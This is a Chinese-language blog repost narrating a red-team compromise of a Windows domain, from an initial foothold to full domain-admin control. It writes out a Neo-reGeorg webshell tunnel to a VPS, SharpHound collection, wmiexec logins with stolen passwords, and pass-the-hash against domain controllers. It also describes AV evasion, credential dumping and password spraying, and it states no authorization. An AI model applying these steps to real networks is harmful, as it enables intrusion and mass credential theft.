渗透Xiao白帽
微信号 SuPejkj
功能介绍 积硅步以致千里,积怠惰以致深渊!
__
收录于话题
以下文章来源于渗透攻击红队 ,作者渗透攻击红队
一个专注于渗透红队攻击的公众号
在域渗透的时候我们手动梳理域内环境需要花很大功夫,这时候通过 SharpHound 对当前机器的环境进行分析,就能够很快知道离域管最近的攻击线路,快速精准打击!
一次完美的内网域渗透
前言
首先是拿到了一个命令执行的点,发现当前跳板机器是存在域环境的:
tasklist 未发现有 AV,并且当前机器是出网机器:
看了看当前系统是 Windows Server 2016:
由于当前是 Windows Server 2016 的服务器,肯定是有微软自带 Windows Defender 的,所以简单做了一下免杀上线到 Cobaltstrike:
然后 ms16-075 提权到 SYSTEM:
内网信息搜集
首先是查看了一下域管分别是哪些用户:
然后查看了一下域控列表,随后 ping 域控机器名得到域控的 IP:
发现域控是 10 段,而当前跳板机器是 192.168.54.200 ,猜测可能不止一个段的机器存活!
先抓一波 hash 把:(Windows server 2016 是抓不了明文密码的)
好家伙,这台机器应该是被”大哥“来过了,应该被改了一下注册表,这才让我抓到了明文,还有其他 hash,之后可以用来 PTH。
然后搜集了一下当前机器的其他密码发现 Oracle 的密码:
然后也抓到了其他浏览器的密码:
整理了一下密码,然后通过域外对域内当前 C 段进行横向喷射:
成功了几台,先留着。
Neo-reGeorg + Socks = 进入目标内网漫游
想要扩大战果还是要做个隧道进行目标内网,但是我发现常用的 frp、nps 都用不了,猜测目标做了限制,后来通过 http 隧道成功进了目标内网!
reGeorg 是 reDuh 的升级版。主要把内网服务器的端口通过http或https隧道转发到本机。
项目地址:https://github.com/L-codes/Neo-reGeorg
先设置密码,生成 tunnel 的 webshell,并上传到目标服务器:
python neoreg.py generate -k pass
这个时候直接 VPS 运行,把目标内网流量通过 http 转发到 VPS 的 1080 端口:
python neoreg.py -k pass -u http://saulgoodman.cn//wls-wsat/tuu.jsp
然后本地 VPS 代理:
说明代理成功了!记住这里是 127.0.0.1 只能本地代理,客户端代理你服务器的 socks 是代理不上的!为了方便我在我再 Windows 上重新代理了一下,方便后续操作!
这个时候就可以进目标内网了,由于当前目标机器时间是凌晨,且确定没有人在用远程桌面,我直接登陆目标远程桌面:
然后对目标桌面上进行信息搜集发现有 SSH 登陆:
成功又拿下内网其他机器:
然后换个用户登陆到 200 这台机器:(发现有大哥扫描过了,资产还挺多)
发现应该都是 docker,没啥价值!资产收集的差不多了该搜集域内的了!
SharpHound 对域内进行信息搜集
通过 SharpHound 对域内进行信息搜集:
execute-assembly /root/桌面/nw/SharpHound.exe -c all
然后把他下载到本地进行分析:
可以看到当前只有四个域管理员:
由于当前跳板机器是DRAxx,我们就分析 DRAxx 的环境:
可以看到当前机器 DRAxx 可以到达 ERIDANUS.xxxx.xxx 机器,思路就是我们可以通过 ERIDANUS 拿到这台机器的权限,然后在拿到最近的域管!那么我们直接通过之前抓到的 ali.hamzeh 密码去横向 wmi 到 ERIDANUS:
proxychains python3 wmiexec.py -shell-type cmd xxxx/ali.hamzeh:passsword@192.168.54.53 -codec gbk
然后直接 Powershell 上线到 CobaltStrike:(太卡了这个 socks,又重开了一个 wmi)
由于当前 ERIDANUS 机器没有 AV 直接提权把:
通过查看当前 ERIDANUS 机器发现的确如 SharpHound 分析那样有一个 ebrahim 域管的进程:
直接注入域管进程上线到 CobaltStrike 吧:
成功拿到域管权限!我为了好区分,绿色 beacon 是 域管!之后直接先抓下域管密码 hash:
有了域管的 hash 后,直接可以 PTH 域控:
proxychains python3 wmiexec.py -shell-type powershell -hashes :84d562d8c6f5xxxxxxxxxx xxxxx/ebrahim@192.168.10.10 -codec gbk
然后还是老样子,直接 PowerShell 上线到 CobaltStrike:(还是老问题,socks 卡,重开了一个窗口)
成功拿到域控 AD :192.168.10.10
然后通过 PTH 也成功拿到域控 INF-AD-2:192.168.10.200
最后 hashdump 拿下整个域用户 hash:
嗯,就到这吧。
【往期推荐】
[【内网渗透】内网信息收集命令汇总](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247485796&idx=1&sn=8e78cb0c7779307b1ae4bd1aac47c1f1&chksm=ea37f63edd407f2838e730cd958be213f995b7020ce1c5f96109216d52fa4c86780f3f34c194&scene=21#wechat_redirect)
[【内网渗透】域内信息收集命令汇总](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247485855&idx=1&sn=3730e1a1e851b299537db7f49050d483&chksm=ea37f6c5dd407fd353d848cbc5da09beee11bc41fb3482cc01d22cbc0bec7032a5e493a6bed7&scene=21#wechat_redirect)
[【超详细 | Python】CS免杀-Shellcode Loader原理(python)](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247486582&idx=1&sn=572fbe4a921366c009365c4a37f52836&chksm=ea37f32cdd407a3aea2d4c100fdc0a9941b78b3c5d6f46ba6f71e946f2c82b5118bf1829d2dc&scene=21#wechat_redirect)
[【超详细 | Python】CS免杀-分离+混淆免杀思路](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247486638&idx=1&sn=99ce07c365acec41b6c8da07692ffca9&chksm=ea37f3f4dd407ae28611d23b31c39ff1c8bc79762bfe2535f12d1b9d7a6991777b178a89b308&scene=21#wechat_redirect)
[【超详细 | 钟馗之眼】ZoomEye-python命令行的使用](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247488453&idx=1&sn=5828a0e1a2299d3ee0215f0ed4c30bf1&chksm=ea37ec9fdd406589124c67c45487be39ed1033d88c627092cf07f6d4f14ccdb9079b38dba74d&scene=21#wechat_redirect)
[【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247488922&idx=1&sn=f43e3c243bbbfd2822867a3acaa8b85e&chksm=ea37eac0dd4063d63d98f935c73ce571cbfeb0e7272a6f171a28143bdb3e7134b09ea874969a&scene=21#wechat_redirect)
[【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247485550&idx=1&sn=921b100fd0a7cc183e92a5d3dd07185e&chksm=ea37f734dd407e22cfee57538d53a2d3f2ebb00014c8027d0b7b80591bcf30bc5647bfaf42f8&scene=21#wechat_redirect)
[【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247486517&idx=1&sn=34d494bd453a9472d2b2ebf42dc7e21b&chksm=ea37f36fdd407a7977b19d7fdd74acd44862517aac91dd51a28b8debe492d54f53b6bee07aa8&scene=21#wechat_redirect)
[【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247487906&idx=1&sn=e35998115108336f8b7c6679e16d1d0a&chksm=ea37eef8dd4067ee13470391ded0f1c8e269f01bcdee4273e9f57ca8924797447f72eb2656b2&scene=21#wechat_redirect)
[【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247487897&idx=1&sn=6ab1eb2c83f164ff65084f8ba015ad60&chksm=ea37eec3dd4067d56adcb89a27478f7dbbb83b5077af14e108eca0c82168ae53ce4d1fbffabf&scene=21#wechat_redirect)
## [【奇淫巧技】如何成为一个合格的“FOFA”工程师](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247485135&idx=1&sn=f872054b31429e244a6e56385698404a&chksm=ea37f995dd40708367700fc53cca4ce8cb490bc1fe23dd1f167d86c0d2014a0c03005af99b89&scene=21#wechat_redirect)
[【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247485992&idx=1&sn=18741504243d11833aae7791f1acda25&chksm=ea37f572dd407c64894777bdf77e07bdfbb3ada0639ff3a19e9717e70f96b300ab437a8ed254&scene=21#wechat_redirect)
[【超详细】Fastjson1.2.24反序列化漏洞复现](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247484991&idx=1&sn=1178e571dcb60adb67f00e3837da69a3&chksm=ea37f965dd4070732b9bbfa2fe51a5fe9030e116983a84cd10657aec7a310b01090512439079&scene=21#wechat_redirect)
[ 记一次HW实战笔记 | 艰难的提权爬坑](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247484991&idx=2&sn=5368b636aed77ce455a1e095c63651e4&chksm=ea37f965dd407073edbf27256c022645fe2c0bf8b57b38a6000e5aeb75733e10815a4028eb03&scene=21#wechat_redirect)
[【漏洞速递+检测脚本 | CVE-2021-49104】泛微E-Office任意文件上传漏洞](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247491093&idx=1&sn=6eb98fb387c0df3a0488f43b2de5fb95&chksm=ea37e14fdd406859c3d72401523c1721d6e16b9aff320aed6f71602554b12be08d13e6cce666&scene=21#wechat_redirect)
[免杀基础教学(上卷)](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247490994&idx=1&sn=bb2486096d4cb848bebda423e96f9853&chksm=ea37e2e8dd406bfe612fe4cfbc7e70f9ce84119f3e9c7f72d38f276b6cb70157ca98f2936640&scene=21#wechat_redirect)
[免杀基础教学(下卷)](http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247491023&idx=1&sn=2b15f46ecf305ef8cb4909c46a9e7e7c&chksm=ea37e295dd406b83b271710e15fd8767a59a81cd8b6b8f5f503123fa765fa6a9dc4ffa5ab0bd&scene=21#wechat_redirect)
走过路过的大佬们留个关注再走呗![](https://gitee.com/fuli009/images/raw/master/public/20220315185116.png)
往期文章有彩蛋哦![](https://gitee.com/fuli009/images/raw/master/public/20220315185117.png)
“如侵权请私聊公众号删文”
预览时标签不可点
收录于话题 #
个
上一篇 下一篇
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看